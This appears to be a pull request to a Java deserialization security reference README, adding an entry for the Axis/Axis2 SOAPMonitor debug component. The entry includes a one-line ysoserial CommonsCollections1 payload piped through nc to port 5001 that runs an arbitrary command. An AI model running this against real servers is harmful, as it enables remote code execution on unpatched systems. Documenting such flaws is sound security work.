### PR TITLE
Added information for the debug tool SOAPMonitor

### DIFF
--- a/README.md
+++ b/README.md
@@ -531,6 +531,16 @@ no spec tool
 
 [JMET](https://github.com/matthiaskaiser/jmet)
 
+##### Axis/Axis2 SOAPMonitor
+- All version (this was deemed by design by project maintainer)
+- Binary
+- Default port : 5001
+- Info : https://axis.apache.org/axis2/java/core/docs/soapmonitor-module.html
+
+> java -jar ysoserial-*-all.jar CommonsCollections1  'COMMAND_HERE' | nc TARGET_SERVER 5001
+
+[ysoserial](#ysoserial)
+
 ### Detect
 ##### Code review
 - *ObjectInputStream.readObject*


### PR DESCRIPTION
This is an easy to exploit deserialization issue in a debug component of Axis and Axis2. Even though it's fixable the maintainer have never wanted to do so. For the reference here's the source of the issue :

http://www.docjar.com/html/api/org/apache/axis2/soapmonitor/servlet/SOAPMonitorService.java.html#251